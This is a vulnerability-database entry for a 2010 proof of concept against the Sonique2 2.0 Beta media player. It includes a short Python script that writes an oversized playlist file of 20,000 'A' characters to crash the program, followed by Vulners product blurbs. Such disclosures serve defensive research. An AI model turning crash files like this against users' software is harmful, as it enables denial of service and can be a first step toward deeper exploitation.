Lucene search
K

Sonique2 2.0 Beta Build 103 Proof Of Concept

🗓️ 24 Jan 2010 00:00:00Reported by b0telh0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Sonique2 2.0 Beta Build 103 Local Crash proof of concept creates a crash file on Windows XP.

Code
`#!/usr/bin/python  
#  
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC  
# Found by: b0telh0  
# Link:  
http://download.softpedia.com/dl/85a8a9ea142e83438019ed775c0d039f/4b59ca05/100006707/software/multimedia/audio/s2beta_103_install.zip  
# Tested on: Windows XP SP3  
  
  
crash = "\x41" * 20000  
  
try:  
file = open('b0t.pls','w');  
file.write(crash);  
file.close();  
print "[+] Created b0t.pls file."  
except:  
print "[-] Error cant write file to system."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
20